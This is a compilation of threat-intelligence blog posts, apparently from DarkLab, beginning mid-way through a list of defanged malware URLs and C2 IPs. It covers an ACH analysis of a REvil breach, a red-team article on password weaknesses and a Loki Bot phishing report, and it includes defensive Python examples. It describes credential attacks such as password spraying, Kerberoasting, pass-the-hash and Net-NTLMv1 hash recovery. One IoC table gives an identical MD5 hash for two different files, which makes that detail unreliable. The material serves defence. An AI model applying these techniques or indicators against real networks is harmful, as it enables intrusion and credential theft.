hxxp://simofferbd24[.]com/wp-includes/fsiQc/
hxxp://401kplansinfo[.]com/cgi-bin/KtFRk/
hxxp://fidelityguide[.]com/cgi-bin/VA/
hxxp://sirnakmidyeci[.]com/wp-includes/qk9wW2/
hxxp://subitocarne[.]com/wp-content/ByeOAt9/
hxxp://eliesalibaarchitect[.]com/wordpress/T/

C2 IPs

24.43.32.186:80  176.111.60.55:8080  121.124.124.40:7080  75.139.38.211:80
38.111.46.46:8080  24.137.76.62:80  89.216.122.92:80  82.225.49.121:80
134.209.36.254:8080  37.187.72.193:8080  82.80.155.43:80  123.176.25.234:80
162.241.242.173:8080  110.145.77.103:80  47.144.21.12:443  194.187.133.160:443
74.120.55.163:80  153.137.36.142:80  93.147.212.206:80  62.30.7.67:443
61.92.17.12:80  1.221.254.82:80  200.123.150.89:443  109.74.5.95:8080
219.74.18.66:443  195.7.12.8:80  121.7.127.163:80  203.153.216.189:7080
156.155.166.221:80  110.5.16.198:80  200.114.213.233:8080  187.161.206.24:80
104.131.44.150:8080  110.5.16.198:80  94.200.114.161:80  157.245.99.39:8080
37.139.21.175:8080  185.94.252.104:443  24.179.13.119:80  195.251.213.56:80
94.1.108.190:443  104.236.246.93:8080  84.39.182.7:80  71.72.196.159:80
169.239.182.217:8080  78.24.219.147:8080  97.82.79.83:80  174.102.48.180:443
220.245.198.194:80  85.152.162.105:80  87.106.136.232:8080  181.169.34.190:80
139.99.158.11:443  85.105.205.77:8080  5.196.74.210:8080  140.186.212.146:80
91.211.88.52:7080  139.59.60.244:8080  5.196.74.210:8080  201.173.217.124:443
62.75.141.82:80  79.137.83.50:443  24.43.99.75:80  42.200.107.142:80
174.45.13.118:80  50.91.114.38:80  213.196.135.145:80  79.98.24.39:8080
137.119.36.33:80  172.91.208.86:80  94.23.237.171:443  5.39.91.110:7080
188.219.31.12:80  74.219.172.26:80  74.134.41.124:80  139.162.108.71:8080
103.86.49.11:8080  83.169.36.251:8080  96.249.236.156:443  74.208.45.104:8080
104.131.11.150:443  153.232.188.106:80  95.213.236.64:8080  61.19.246.238:443
124.41.215.226:80  209.141.54.221:8080  137.59.187.107:8080  50.35.17.13:80
78.187.156.31:80  168.235.67.138:7080  137.59.187.107:8080  95.179.229.244:8080
104.32.141.43:80  139.130.242.43:80  137.59.187.107:8080  216.139.123.119:80
107.5.122.110:80  68.188.112.97:80  219.75.128.166:80  120.150.60.189:80
87.106.139.101:8080

A tale of two hacks

A case study in structured intelligence analysis

In recent weeks DarkLab helped a large international company conduct a threat hunting exercise in their infrastructure following a network breach.

The initial investigations revealed that threat actors infiltrated the network using legitimate, likely stolen, credentials on a Citrix server hosted in a European subsidiary of our client. From there, however, the DarkLab team discovered two sets of activity. One led to the exfiltration of large amounts of data, the other to the deployment of the REvil ransomware, also known as Sodinokibi. We previously reported on how ransomware operators are increasingly stealing data from their victims to threaten its release if their ransom demands are not met. It therefore seemed possible that the two sets of malicious activity were carried out by the same threat actor.

Indeed, the initial entry point was the same, and the stolen data was uploaded to Mega, a popular file hosting site previously used by REvil operators. However, some other aspects of the malicious actions did not add up. For instance, data was exfiltrated weeks after the ransomware was deployed, which is inconsistent with the previously observed tactics, techniques and procedures (TTPs) of ransomware operators, who steal data before encrypting so that they have leverage when the ransom note lands. Also, the activities that led to ransomware deployment and those that ended in data theft used commonly seen but different toolsets: in one incident Cobalt Strike was the attack tool on day one, while the other set of activities involved stand-alone PsExec the day after. Since Cobalt Strike has PsExec-style lateral movement built in, we started doubting whether the two incidents were carried out by the same hacker.

Assessing pieces of conflicting evidence can be messy and can lead to the wrong conclusion. In order to analyse the evidence in an unbiased and objective manner, DarkLab analysts resolved to employ a traditional intelligence analysis technique in use since the 1970s, when Richards Heuer developed it at the CIA. Despite its age, the Analysis of Competing Hypotheses (ACH) remains a useful framework for answering difficult questions in a way that removes an analyst's potential biases or misconceptions.

Our analysts created a table like the one below, where each piece of evidence is given a credibility and relevance score before its consistency with each hypothesis is evaluated. The hypothesis with the highest score is considered the most likely.

In our case we considered the following hypotheses:

H1: Incident 1 and 2 were carried out by the same attacker

H2: Incident 1 and 2 were carried out by two different attackers

H3: Incident 1 and 2 were carried out by more than two attackers

Fig 1 – ACH table

By rating the evidence collected as consistent (C), not applicable (N) or inconsistent (I) with each hypothesis, a final score is calculated. H2 scored the highest, indicating it was clearly the most likely hypothesis. This suggested that different threat actors were indeed separately involved in the ransomware deployment and the data exfiltration.

In this way, we were able to use a fact-based, objective analysis of the available intelligence to our advantage in a live threat hunting exercise. In particular, our threat hunting team was able to treat the incidents as separate, with significant implications for their efforts in detecting and mitigating the breaches.
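The scoring behind the ACH table can be made explicit. What follows is an added example for this page, not the analysts' actual table: the evidence rows paraphrase the points raised in the text, while the credibility and relevance weights (1 = low, 3 = high) and the C/N/I ratings are illustrative assumptions chosen for the example.

```python
"""Analysis of Competing Hypotheses scoring. Added example, not the table
from the original post; weights and ratings are illustrative assumptions."""
from dataclasses import dataclass
from typing import Dict, List, Tuple

HYPOTHESES = {
    "H1": "Incidents 1 and 2 were carried out by the same attacker",
    "H2": "Incidents 1 and 2 were carried out by two different attackers",
    "H3": "Incidents 1 and 2 were carried out by more than two attackers",
}


@dataclass
class Evidence:
    description: str
    credibility: int            # 1..3, how much the observation is trusted
    relevance: int              # 1..3, how diagnostic it is for the question
    ratings: Dict[str, str]     # hypothesis id -> "C", "N" or "I"

    def weight(self) -> int:
        return self.credibility * self.relevance


# Constructed ratings (assumptions) for the evidence discussed in the post.
EVIDENCE: List[Evidence] = [
    Evidence("Both activity sets entered via the same Citrix server with legitimate credentials",
             3, 2, {"H1": "C", "H2": "C", "H3": "C"}),
    Evidence("Stolen data uploaded to Mega, a service previously used by REvil operators",
             2, 2, {"H1": "C", "H2": "N", "H3": "N"}),
    Evidence("Exfiltration occurred weeks after the ransomware was deployed",
             3, 3, {"H1": "I", "H2": "C", "H3": "C"}),
    Evidence("Cobalt Strike on day one, stand-alone PsExec the day after, although Cobalt Strike has PsExec built in",
             3, 3, {"H1": "I", "H2": "C", "H3": "C"}),
    Evidence("The second intruder had to re-enter after the ransomware destroyed their callbacks",
             2, 3, {"H1": "I", "H2": "C", "H3": "C"}),
    Evidence("Only two distinct toolsets and two distinct timelines were observed",
             2, 2, {"H1": "N", "H2": "C", "H3": "I"}),
]

RATING_VALUE = {"C": 1, "N": 0, "I": -1}


def score(evidence: List[Evidence], hypotheses: Dict[str, str]) -> Tuple[Dict[str, int], Dict[str, int]]:
    """Weighted consistency score per hypothesis (C adds the weight, I subtracts
    it, N is neutral) and, separately, the weighted inconsistency total that
    Heuer's original method ranks on (fewest inconsistencies wins)."""
    totals = {h: 0 for h in hypotheses}
    inconsistent = {h: 0 for h in hypotheses}
    for e in evidence:
        for h in hypotheses:
            r = e.ratings[h]
            if r not in RATING_VALUE:
                raise ValueError(f"bad rating {r!r} for {h}")
            totals[h] += RATING_VALUE[r] * e.weight()
            if r == "I":
                inconsistent[h] += e.weight()
    return totals, inconsistent


def rank(evidence: List[Evidence], hypotheses: Dict[str, str]) -> List[str]:
    """Highest consistency score first; ties broken by fewer inconsistencies."""
    totals, inconsistent = score(evidence, hypotheses)
    return sorted(hypotheses, key=lambda h: (-totals[h], inconsistent[h]))


def render(evidence: List[Evidence], hypotheses: Dict[str, str]) -> str:
    cols = list(hypotheses)
    lines = ["Evidence (credibility x relevance)".ljust(72) + "  ".join(cols)]
    for e in evidence:
        lines.append(f"{e.description[:60]:<60} ({e.credibility}x{e.relevance})     "
                     + "   ".join(e.ratings[h] for h in cols))
    totals, inconsistent = score(evidence, hypotheses)
    lines.append("Score".ljust(70) + " ".join(f"{totals[h]:>3}" for h in cols))
    lines.append("Weighted inconsistencies".ljust(70) + " ".join(f"{inconsistent[h]:>3}" for h in cols))
    return "\n".join(lines)


if __name__ == "__main__":
    print(render(EVIDENCE, HYPOTHESES))
    print("Most likely:", rank(EVIDENCE, HYPOTHESES)[0])
```

Both scoring views agree here: H2 has the highest weighted consistency and no inconsistencies at all, H1 is penalised by the three timeline and tooling observations, and H3 only loses on the absence of a third toolset. The value of writing the weights down is that changing one assumption (for example, lowering the credibility of the Mega observation) immediately shows whether the conclusion is robust.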

Further details on the incidents

Our forensic investigation identified how the ransomware attack lasted a total of five days, while the threat actor that stole the data was able to remain undetected in the network for almost six weeks. In both cases, the number of hosts compromised was significant and threat actors were able to move across different countries’ networks without being detected.

The REvil operator used the legitimate remote access solution AnyDesk as a backdoor, and eventually deployed the ransomware to over 1000 servers and workstations in Hong Kong and the UK. Ironically, the ransomware interfered with the callbacks the second attacker had already established on 10 machines: all their call-back connections on the compromised servers were gone after the ransomware attack, and they were forced to restart from the initially compromised Citrix server in the UK. From there, they used Cobalt Strike for lateral movement and privilege escalation on multiple accounts in Hong Kong, the US and India. This second attacker collected hundreds of gigabytes of data from different servers, staged it internally, compressed it, and eventually uploaded it to a Mega cloud server.

Mitigation

The presence of two separate attackers within the network of a large conglomerate indicates the significant challenges that large organisations with tens of thousands of endpoints can face. Deploying standard policies on such a large estate can be challenging, but we strongly suggest organisations to:

  • Enable Multi-Factor Authentication (MFA) for all remote access
  • Enforce strong password policies and proper Active Directory-based mechanisms, or a managed password solution, to protect Domain Administrator accounts
  • Tighten cloud file storage usage; some solutions offer built-in micro-segmentation that can help prevent attackers accessing your data
  • Consider employing Managed Detection and Response services to automatically and proactively mitigate threats in a 24/7 manner

Indicators of Compromise

Host-based

Filename     MD5                               Description
payload.txt  f5dd8644b011a6ecaf405ee9bc5c6852  Cobalt Strike implant callback
beac.exe     500286eaf9eb11b34eb413bb0df5543b  Cobalt Strike implant callback
55.exe       500286eaf9eb11b34eb413bb0df5543b  Ransomware
Beta.exe     90e6ea15ed18005b431e135186d57abf  Ransomware

Network-based

Value              Description
82.31.145[.]121    Infiltration IP
94.7.101[.]89      Infiltration IP
158.174.247[.]194  Infiltration IP
212.80.217[.]174   Call-back IP
51.83.165[.]21     Call-back IP
fairyschool[.]art  C2 domain for beac.exe

You Shall Not Pass(words)

A red teamer’s perspective on what is wrong with passwords, and how to make it right

“Your passwords are weak” is one of the most common observations we find ourselves making in our red teaming work, and it often surprises organisations: their passwords meet their formal complexity requirements. However, a password that complies with a password policy is not necessarily a strong password. Password policies are usually designed around the compliance features available in Windows, and some of these, like the 20-year-old Windows password complexity setting, are quite outdated.

In the course of one red team engagement our offensive security professionals can encounter hundreds of weak passwords. Weak passwords allow hackers to infiltrate your network and to move laterally in your environment. In this article, we draw from our offensive security experience to illustrate common misconception about passwords, and what companies should do to enforce stronger ones.

Beyond a lengthy and repetitive approach

In 2017 NIST Special Publication SP 800-63-3 (specifically the SP 800-63B volume on authenticators) introduced an interesting concept: that composition rules and expiry dates are neither necessary nor effective for memorised secrets like passwords.

This was published at a time where most security control guidelines still required corporate users to use complex passwords and change them periodically, sometimes as often as every month. Instead, NIST encouraged a new approach including using multi-factor authentication solutions wherever possible and checking passwords against dictionary lists, among others.

Microsoft has since implemented some of these suggestions within the Windows platform. From our experience, however, most organisations in Hong Kong and Asia Pacific still lack a full understanding of some of these technologies to apply them effectively. The first misconception is that short passwords and PINs are weak. This is an over-simplification of how security works. The strength of a password should be assessed alongside its potential exploitation techniques.

Length does not always matter

One example is the use of Windows PINs compared to Windows domain passwords. Their requirements should be different because their potential attack vectors are as well. While hashes of Windows passwords can be downloaded and bruteforced offline, PINs cannot. Also, PINs have a much smaller attack surface compared to a domain password.

Windows domain passwords are one of the most common ways to gain access to a target network and its resources in a Windows environment. Domain passwords must be strong because attackers can abuse each one of them at different points of a corporate network. For instance, during red team engagements we typically conduct password spraying with a standard set of common passwords within the local network and sometimes against remote applications, such as Outlook Web Access. We can also abuse Windows functionality to obtain password hashes, via Kerberoasting or LLMNR poisoning for instance, and then crack them offline. Strong, complex passwords would be much harder, if not impossible, to crack, and harder to guess in a password spraying attack.

On the contrary, a Windows PIN can only be used on a single Windows machine, and an attacker can be further slowed down by introducing a delay between failed attempts.

Does a long, complex PIN make sense in this case? A 12-character, complex Windows PIN which can only be entered (and therefore attempted by the attacker) on a physical machine is unnecessary. From a red teamer point of view, a 6- to 8-character PIN is sufficient for a Windows PIN environment.

While it takes only a few hours to brute-force a hashed 8-character Windows password offline, it takes much longer to test candidate PINs in person on a Windows machine. Brute-forcing a PIN is also impractical because the TPM's anti-hammering protection locks PIN attempts for 24 hours after 32 wrong attempts. This is summarised in the graph below.
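The comparison above can be reproduced with a simple effort model. This is an added example for this page, not the post's own graph, and it rests on two assumptions stated here rather than taken from the post: an offline NTLM cracking rate of 100 billion guesses per second (a multi-GPU rig; NTLM is an unsalted MD4, so it cracks quickly), and a TPM-protected PIN that allows 32 guesses per 24 hours, the anti-hammering budget quoted above. It models brute force only; dictionary and rule-based attacks, which find policy-compliant passwords like those listed later in this article, are far quicker.

```python
"""Offline hash cracking versus TPM-throttled PIN guessing. Added example,
not the post's own figures; the cracking rate is an assumption."""
from typing import Dict, List, Tuple

OFFLINE_GUESSES_PER_SEC = 100e9      # assumption: multi-GPU NTLM rate
ONLINE_PIN_GUESSES_PER_DAY = 32      # TPM anti-hammering budget quoted above

CHARSETS: Dict[str, int] = {
    "digits only": 10,
    "lowercase": 26,
    "lowercase + digits": 36,
    "upper + lower + digits + symbols": 95,
}


def expected_guesses(charset_size: int, length: int) -> float:
    """On average half the keyspace is searched before the hit."""
    return charset_size ** length / 2


def offline_seconds(charset_size: int, length: int, rate: float = OFFLINE_GUESSES_PER_SEC) -> float:
    """Time to crack a hash of the given shape when the attacker holds the hash."""
    return expected_guesses(charset_size, length) / rate


def online_pin_seconds(length: int, per_day: int = ONLINE_PIN_GUESSES_PER_DAY) -> float:
    """A numeric PIN tried on the device itself, throttled by the TPM."""
    return expected_guesses(10, length) / per_day * 86400


def human(seconds: float) -> str:
    for unit, size in (("years", 365.25 * 86400), ("days", 86400), ("hours", 3600), ("minutes", 60)):
        if seconds >= size:
            return f"{seconds / size:,.1f} {unit}"
    return f"{seconds:.1f} seconds"


def comparison(lengths=(6, 8, 10, 12)) -> List[Tuple[str, int, str]]:
    """Rows of (attack, length, expected time) for the table printed below."""
    rows = []
    for length in lengths:
        for name, size in CHARSETS.items():
            rows.append((f"offline hash, {name}", length, human(offline_seconds(size, length))))
        rows.append(("online TPM-throttled PIN, digits only", length, human(online_pin_seconds(length))))
    return rows


if __name__ == "__main__":
    for attack, length, when in comparison():
        print(f"{attack:<45} {length:>2} chars  {when}")
```

With these assumptions an 8-character password drawn from the full keyboard falls in about nine hours offline, while a 6-digit PIN that can only be tried on the device takes over forty years at 32 guesses a day; that gap, not the character count, is why the two deserve different policies.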

Therefore a Windows PIN, or any PIN tied to a hardware device such as an iOS device:

  • Does not require length and complexity
  • Does not require frequent expiry dates

Bypassing passwords

There are other authentication solutions other than passwords and PINs. Some organisations use smartcards, which seem like an elegant solution. In effect, the “PIN” that users enter would unlock the content of the smartcard, which can subsequently be used to connect to domain resources.

The problem often lies with the implementation of these solutions. In most situations, smartcard logon still leaves the account with an NTLM hash: Windows sets a random password on accounts that are required to use a smartcard, and the resulting NTLM hash is handed to the client after the PIN-unlocked certificate logon so that NTLM-based access keeps working. This hash is random and complex enough not to be crackable into cleartext. However, the system never rotates it unless the domain's "rolling of expiring NTLM secrets" setting is enabled, so it can be used directly to authenticate to Windows domain resources via pass-the-hash. If this NTLM hash is compromised, it allows attackers persistent access for a long time.

For us red teamers, one way to get these hashes is via the Net-NTLMv1 authentication that some organisations still allow. A Net-NTLMv1 response can be converted directly back into the NTLM hash, which can then be used for pass-the-hash. This is because Net-NTLMv1 builds its response from three separate DES encryptions of the 8-byte server challenge, keyed with three 7-byte slices of the NTLM hash (the 16-byte hash is padded to 21 bytes with zeros, so the third key holds only two unknown bytes). Each DES operation can be cracked independently, and with a fixed server challenge precomputed tables recover the keys outright, yielding the NTLM hash itself rather than a password that still needs cracking.

Another solution for moving beyond password authentication is Windows Hello for Business. This Microsoft solution is meant to let businesses move to a password-less environment: in a nutshell, a Windows Hello for Business PIN or biometric unlocks credentials (stored as certificates or keys) held in the PC's TPM. We have yet to see widespread adoption of Windows Hello for Business, though.

Trust but verify

For those of us that must still rely on windows domain passwords, an important addition would be to introduce a password checking process. Most organisations do this via complexity requirements built-in to Windows.

As our readers may have guessed by now, complexity requirements are not enough. Consider the following “strong” passwords, all of which meet Windows complexity policies:

  • P@ssw0rd
  • P@$$w0rd
  • Username!July
  • July!2020

From an IT security controls or compliance perspective, these are good passwords that meet policy requirements. From a red teamer's perspective, they are all very weak.

From our experience, at least 70% of all passwords within an organisation are similarly weak passwords that nonetheless comply with password policies.

The problem could be addressed by increasing the complexity required by password policies. However, this would likely increase users’ frustration while not necessarily making life harder for an attacker.

To ensure that systems are secured with stronger passwords, organisations need a solution that takes real-world attack scenarios into consideration. Consider a password audit exercise, which checks your users' new and existing passwords against a list of:

  • Known passwords from leaked data breaches
  • Most commonly used passwords
  • Passwords that contain references to the organisation, username, etc.
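The three checks above are easy to get subtly wrong: a plain wordlist comparison misses P@ssw0rd, and a substring check for the year misses July!2020 once substitutions have been undone. The block below is an added example for this page, not DarkLab's tool. It normalises the common substitutions so that P@ssw0rd and P@$$w0rd both match a wordlist entry "password", strips trailing decoration such as "2020!" to find the base word, and looks for usernames, organisation terms, month names and recent years. The lists are tiny constructed stand-ins for the three sources listed above; a real audit runs breach-derived lists against hashes extracted from Active Directory, never against cleartext.

```python
"""Password audit check of the kind described above. Added example, not
DarkLab's tool; the wordlists and organisation terms are constructed."""
import re
from typing import List, Set

# Constructed stand-ins for breach-derived and most-common-password lists.
BREACHED: Set[str] = {"password", "welcome", "letmein", "qwerty", "iloveyou", "summer"}
MONTHS = {"january", "february", "march", "april", "may", "june", "july",
          "august", "september", "october", "november", "december"}
ORG_TERMS: Set[str] = {"darklab", "pwc"}     # assumption: the organisation's own names

LEET = str.maketrans({"@": "a", "$": "s", "0": "o", "1": "i", "!": "i",
                      "3": "e", "4": "a", "5": "s", "7": "t"})
YEAR_RE = re.compile(r"(?:19|20)\d\d")


def normalise(pw: str) -> str:
    """Lowercase and undo leetspeak so 'P@$$w0rd' compares as 'password'."""
    return pw.lower().translate(LEET)


def base_word(pw: str) -> str:
    """Strip leading/trailing digits and symbols from the raw password, then normalise,
    so 'Welcome2021!' yields 'welcome'."""
    stripped = re.sub(r"^[^a-z]+|[^a-z]+$", "", pw.lower())
    return normalise(stripped)


def audit(password: str, username: str, year: int, org_terms: Set[str] = ORG_TERMS) -> List[str]:
    """Return the reasons a password would fail the audit; an empty list means it passed.
    `year` is the audit year, passed in so results are reproducible."""
    reasons = []
    norm, base = normalise(password), base_word(password)
    if norm in BREACHED or base in BREACHED:
        reasons.append("matches a breach-derived or common password (after undoing substitutions)")
    if base in MONTHS or any(m in norm for m in MONTHS):
        reasons.append("contains a month name")
    # Years are matched on the raw password: normalisation turns digits into letters.
    years = {int(y) for y in YEAR_RE.findall(password)}
    if any(year - 5 <= y <= year + 1 for y in years):
        reasons.append("contains a recent year")
    if len(username) >= 3 and username.lower() in norm:
        reasons.append("contains the username")
    for term in org_terms:
        if term in norm:
            reasons.append(f"contains organisation term '{term}'")
    return reasons


if __name__ == "__main__":
    for pw in ["P@ssw0rd", "P@$$w0rd", "Alice!July", "July!2020", "correct-horse-battery-staple"]:
        findings = audit(pw, "alice", 2020)
        print(f"{pw:<30} {'WEAK: ' + '; '.join(findings) if findings else 'no findings'}")
```

All four passwords from the list earlier in this article fail, each for a different reason, while a long passphrase with no decoration passes even though it contains no uppercase letters or symbols, which is exactly the distinction a complexity rule cannot make.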

Fortunately for Windows users, such functionality is provided with an Azure AD subscription (Azure AD Password Protection, which can also be extended to on-premises Active Directory domain controllers).

For companies that do not use Azure AD, DarkLab also offers a solution with similar functionalities that relies on password blacklists from our Threat Intelligence practice.

Whatever solutions you choose, remember the key concepts we went through:

  • Longer is not always better
  • PINs are better than passwords
  • Passwordless solutions must be correctly implemented
  • Perform a password audit by checking your passwords against a blacklist, without adding unnecessary complexity!

Phishing Vessels

Loki Bot campaign targets maritime industry

DarkLab intelligence analysts detected a Loki Bot phishing campaign targeting the maritime and engineering sectors in Europe, Asia and the US from spoofed email addresses of legitimate organisations in Asia.

Figure 1 – Countries of origin of phishing recipients (blue) and legitimate organisations’ spoofed addresses (red)

Recipients of phishing emails – hard to see in the map above – were also located in Singapore.

The earliest phishing email detected dates back to October 2019. However, our previous research indicates that this threat actor is using maritime themes in their phishing campaigns since at least 2018, and is linked to other malware families including Pony.

The 2019 email was sent from a likely compromised subdomain of an Indonesian company and contained a malicious archive (.rar) attachment purportedly pertaining to a purchase order, a common theme of spam emails.

Since then, the actor behind the campaign refocused their phishing lures by spoofing emails of legitimate organisations linked to the maritime industry, and by referring to vessels and other naval themes in their emails.

Figure 2 – Example of phishing email spoofing a Singapore-based shipping company

Figure 3 – Example of phishing email sent to a Switzerland-based maritime consultancy

Some phishing emails showed a good knowledge of the shipping industry, including believable details of existing ships and port locations.

Figure 4 – Example of phishing email sent to a Japanese shipping company

Figure 4 – Example of phishing email sent to an Italian engineering contractor, purporting to be from a Chinese port authority

For instance, both vessels mentioned in the email above, Glovis Crown and Glovis Splendor, are 200m long cargo ships registered in the Marshall Islands. It remains unclear how criminals managed to obtain such details, although it seems likely that they derive from previously hijacked communications of potentially unrelated victims.

This second wave of phishing emails has been active between February and late June 2020, suggesting the campaign is likely still active.

Phishing emails switched to a malicious Microsoft Excel (.xlsx) attachment containing an exploit for CVE-2017-11882. This vulnerability in Microsoft Equation Editor allows remote code execution on a vulnerable machine when the victim opens a document. The exploit has been actively used by multiple cybercriminal groups due to the level of access it grants to the victim machine and the lack of user interaction needed.

Figure 5 – Screenshot of malicious xlsx attachment to email in Figure 4 [MD5: e7bb1284bf0e723b47435b0f70504b3f]

The malicious documents are downloaders for Loki Bot, an information stealer first seen in 2015. The malicious payloads observed, and additional ones found by pivoting on the attack infrastructure, are downloaded from duckdns.org subdomains likely created with domain generation algorithms (DGA).
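
The dynamic-DNS hosting described above is something a defender can hunt for in proxy or DNS logs. The following is an added example, not part of the article: it flags hosts under duckdns.org whose registrant label is unusually long or high-entropy, and separately matches known indicators. The two indicator domains are copied from the article’s IoC list; the log lines, client addresses, URL paths and the thresholds are constructed assumptions.

```python
import math
from collections import Counter
from urllib.parse import urlsplit

# Dynamic-DNS suffixes to inspect. duckdns.org is the provider named in the campaign;
# extend the tuple with other providers used in your environment.
DYNAMIC_DNS_SUFFIXES = ("duckdns.org",)

LONG_LABEL = 20       # assumption: labels this long on free dynamic DNS are rarely human-chosen
HIGH_ENTROPY = 3.5    # assumption: bits per character; tune against your own baseline

# Defanged indicators taken from the article's IoC list; refang() undoes the [.] before matching.
KNOWN_IOCS_DEFANGED = [
    "russchine2specialplumbingwsdymaterialgh3.duckdns[.]org",
    "12chnesstdywealthandmoduleorganisationrn.duckdns[.]org",
]

# Constructed proxy log (timestamp, client, method, URL). Not real traffic.
SAMPLE_PROXY_LOG = """\
2020-06-12T08:14:02Z 10.10.5.21 GET http://www.example.com/index.html
2020-06-12T08:15:10Z 10.10.5.21 GET http://myhome.duckdns.org/status
2020-06-12T08:16:44Z 10.10.5.33 GET http://russchine2specialplumbingwsdymaterialgh3.duckdns.org/file1.bin
2020-06-12T08:17:03Z 10.10.5.33 GET http://chneswealthandorganisationstdy7joppl.duckdns.org/file2.bin
"""


def refang(indicator: str) -> str:
    """Turn a defanged indicator back into a matchable hostname."""
    return indicator.replace("[.]", ".").replace("hxxp", "http")


def shannon_entropy(text: str) -> float:
    """Bits of entropy per character of the label."""
    if not text:
        return 0.0
    counts = Counter(text)
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def classify_host(host: str, known_iocs: set) -> list:
    """Return the reasons a host is suspicious ([] = nothing to report)."""
    reasons = []
    host = host.lower().rstrip(".")
    if host in known_iocs:
        reasons.append("known_ioc")
    for suffix in DYNAMIC_DNS_SUFFIXES:
        if host.endswith("." + suffix):
            # The registrant-chosen label is the one directly left of the provider suffix.
            label = host[: -len(suffix) - 1].split(".")[-1]
            if len(label) >= LONG_LABEL:
                reasons.append("long_dynamic_dns_label")
            if shannon_entropy(label) >= HIGH_ENTROPY:
                reasons.append("high_entropy_dynamic_dns_label")
    return reasons


def scan_proxy_log(log_text: str, known_iocs_defanged) -> list:
    """Parse space-separated proxy lines and return one alert per suspicious request."""
    iocs = {refang(i).lower() for i in known_iocs_defanged}
    alerts = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue
        timestamp, client, _method, url = parts[:4]
        host = urlsplit(url).hostname or ""
        reasons = classify_host(host, iocs)
        if reasons:
            alerts.append({"time": timestamp, "client": client, "host": host, "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in scan_proxy_log(SAMPLE_PROXY_LOG, KNOWN_IOCS_DEFANGED):
        print(alert)
```

The heuristic catches the fourth log line even though that domain is not in the indicator list, which is the point: indicator matching alone lapses as soon as the actor registers a fresh subdomain, whereas the provider-plus-label pattern survives rotation.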

The payload, Loki Bot, can steal credentials from browsers and email clients, among other programs, and has keylogging capabilities. The malware also sends identifying information about the victim’s hosts to a C2 to inform threat actors of the successful infection.

The current Loki Bot campaign highlights the ongoing threat of commodity malware and widespread phishing to organisations in the maritime and engineering sectors. Although the campaign exploits well-known threat vectors, the lack of widespread adoption of anti-spoofing technologies like SPF and DMARC, or their incorrect implementation, means that criminals can continue sending credible phishing emails apparently from legitimate domains.
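
As an added illustration of the “incorrect implementation” point (example code, not from the article), the checker below parses SPF and DMARC TXT records and reports the settings that leave a domain spoofable: a permissive or missing all mechanism in SPF, and a monitor-only p=none policy, partial enforcement or missing reporting address in DMARC. The four records are constructed for the example and show a weak configuration beside its hardened form.

```python
def parse_spf(record: str) -> dict:
    """Split an SPF TXT record into its terms and the qualifier on 'all'."""
    mechanisms = []
    all_qualifier = None
    for term in record.split()[1:]:          # skip the v=spf1 version tag
        if "=" in term:                       # modifiers such as redirect= / exp=
            mechanisms.append(term)
            continue
        qualifier = "+"                       # an unqualified mechanism means pass
        if term[0] in "+-~?":
            qualifier, term = term[0], term[1:]
        if term.lower() == "all":
            all_qualifier = qualifier
        mechanisms.append(term)
    return {"mechanisms": mechanisms, "all": all_qualifier}


def assess_spf(record) -> list:
    """Return weaknesses in an SPF record ([] = enforcing)."""
    if not record or not record.lower().startswith("v=spf1"):
        return ["no_spf"]
    parsed = parse_spf(record)
    findings = []
    if parsed["all"] in ("+", "?"):
        findings.append("permissive_all")     # any host may send as the domain
    elif parsed["all"] == "~":
        findings.append("softfail_all")       # receivers rarely reject on softfail alone
    elif parsed["all"] is None and not any(m.lower().startswith("redirect=") for m in parsed["mechanisms"]):
        findings.append("missing_all")        # default result is neutral, i.e. no protection
    if any(m.lower().startswith("ptr") for m in parsed["mechanisms"]):
        findings.append("ptr_mechanism")      # deprecated by RFC 7208 and slow to evaluate
    return findings


def parse_dmarc(record: str) -> dict:
    """Turn 'v=DMARC1; p=reject; rua=...' into a tag dictionary."""
    tags = {}
    for part in record.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip().lower()] = value.strip()
    return tags


def assess_dmarc(record) -> list:
    """Return weaknesses in a DMARC record ([] = enforcing with reporting)."""
    if not record or not record.lower().startswith("v=dmarc1"):
        return ["no_dmarc"]
    tags = parse_dmarc(record)
    findings = []
    policy = tags.get("p", "").lower()
    if policy == "none":
        findings.append("policy_none")        # monitor only: spoofed mail is still delivered
    elif policy not in ("quarantine", "reject"):
        findings.append("invalid_policy")
    if tags.get("sp", "").lower() == "none":
        findings.append("subdomain_policy_none")
    try:
        if int(tags.get("pct", "100")) < 100:
            findings.append("partial_enforcement")
    except ValueError:
        findings.append("invalid_pct")
    if "rua" not in tags:
        findings.append("missing_rua")        # no aggregate reports, so abuse goes unnoticed
    return findings


def assess_domain(spf_record, dmarc_record) -> dict:
    """Combined view for one domain; feed it the TXT records of <domain> and _dmarc.<domain>."""
    return {"spf": assess_spf(spf_record), "dmarc": assess_dmarc(dmarc_record)}


# Constructed records: the weak configuration beside its corrected form.
WEAK_SPF = "v=spf1 include:_spf.example.net ?all"
WEAK_DMARC = "v=DMARC1; p=none"
HARDENED_SPF = "v=spf1 ip4:198.51.100.0/24 include:_spf.example.net -all"
HARDENED_DMARC = "v=DMARC1; p=reject; sp=reject; pct=100; rua=mailto:dmarc-reports@example.com"

if __name__ == "__main__":
    print("weak:    ", assess_domain(WEAK_SPF, WEAK_DMARC))
    print("hardened:", assess_domain(HARDENED_SPF, HARDENED_DMARC))
```

To run it against a live domain, fetch the TXT records with a resolver (for instance dnspython’s dns.resolver.resolve(name, "TXT")) for the domain itself and for the _dmarc subdomain, and pass the strings to assess_domain. Note that SPF alone does not stop a spoofed From header; the DMARC policy is what makes the alignment check enforceable.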

Indicators of Compromise

Email Sender’s IP

103.253.115[.]37

Downloader Domains

russchine2specialplumbingwsdymaterialgh3.duckdns[.]org

chneswealthandorganisationstdy7joppl.duckdns[.]org

12chnesstdywealthandmoduleorganisationrn.duckdns[.]org

chnes14wealthandstdymoduleorganisationoo.duckdns[.]org

chnthreewealthsndy3andreinforcementagenc.duckdns[.]org

20chneswealthandsndymoduleorganisationvz.duckdns[.]org

chnes29sndyqudusisabadassniggainthebba.duckdns[.]org

united32wsdyfrkesokoriorimistreetsjkjd.duckdns[.]org

russchine2sndymapanxmenischangedone14ajb.duckdns[.]org

sndychnesprvlandofglorylandoflifeforle.duckdns[.]org

greenpegheedahatakankeadeshnaajaotawsdy.duckdns[.]org

Payloads

4ae5c9c199377980ebc558d27e7855960c69167138951378666421b9b3db09de

bcc826091ec71230947aa1916263434935a58ffe5977cf415b1d970633939652

